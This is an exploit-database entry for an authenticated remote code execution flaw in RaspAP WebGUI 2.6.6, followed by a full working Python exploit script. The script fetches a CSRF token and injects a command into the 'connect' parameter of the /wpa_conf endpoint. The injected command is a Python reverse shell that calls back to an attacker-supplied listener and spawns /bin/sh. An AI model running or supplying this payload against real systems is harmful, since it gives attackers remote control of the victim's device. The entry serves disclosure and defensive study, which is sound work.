RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)

vendor:

RaspAP WebGUI

by:

Moritz Gruber

9,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: RaspAP WebGUI

Affected Version From: 2.6.6

Affected Version To: 2.6.6

Patch Exists: YES

Related CWE: N/A

CPE: a:raspap:raspap_webgui

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux raspberrypi 5.10.52-v7+

2021

RaspAP 2.6.6 – Remote Code Execution (RCE) (Authenticated)

A vulnerability in RaspAP 2.6.6 allows an authenticated user to execute arbitrary code on the target system. This is achieved by sending a malicious payload to the /wpa_conf endpoint, which is then executed by the system. The payload is sent using a POST request with the user's credentials, and the malicious code is stored in the 'connect' parameter.

Mitigation:

Ensure that all users have strong passwords and that the system is kept up to date with the latest security patches.

Source

Exploit-DB raw data:

# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 23.08.2021
# Exploit Author: Moritz Gruber <moritz@aware7.de>
# Vendor Homepage: https://raspap.com/
# Software Link: https://github.com/RaspAP/raspap-webgui
# Version: 2.6.6
# Tested on: Linux raspberrypi 5.10.52-v7+

import requests
from requests.api import post
from requests.auth import HTTPBasicAuth
from bs4 import BeautifulSoup
import sys, re

if len(sys.argv) != 7:
    print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")
    sys.exit()
else:  
    target_host = sys.argv[1]
    target_port = sys.argv[2]
    username = sys.argv[3]
    password = sys.argv[4]
    listener_host = sys.argv[5]
    listener_port = sys.argv[6]

    endpoint = "/wpa_conf"
    exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    url = "http://{}:{}/{}".format(target_host,target_port,endpoint)

    s = requests.Session()

    get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
    soup = BeautifulSoup(get_Request.text, "lxml")
    csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")
   
    post_data = {
        "csrf_token": csrf_token,
        "connect": "wlan; {}".format(exploit)
    }
    post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))
    if post_Request.status_code:
        print("Exploit send.")
    else:
        print("Something went wrong.")
    print("Done")